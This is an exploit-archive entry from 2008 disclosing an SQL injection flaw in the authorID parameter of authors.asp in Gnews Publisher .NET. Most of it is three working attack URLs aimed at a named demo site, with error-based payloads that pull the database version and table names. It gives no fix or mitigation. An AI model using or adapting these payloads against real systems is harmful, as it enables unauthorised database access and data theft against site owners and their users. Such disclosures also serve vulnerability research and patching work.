id: 4482
date: 12/16/2008
title: Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability
author: AlpHaNiX
cves: 

=======================================================================
Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability
=======================================================================



###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : Gnews Publisher
#download : null
#Demo     : http://www.gazatem.com/demos/gnews/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--

http://www.gazatem.com/demos/gnews/authors.asp?authorID=(SQL)

http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+@@version));--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+top+1+table_name+from+information_schema.tables));--


###########################################################################



#  0day.today [2023-03-26]  #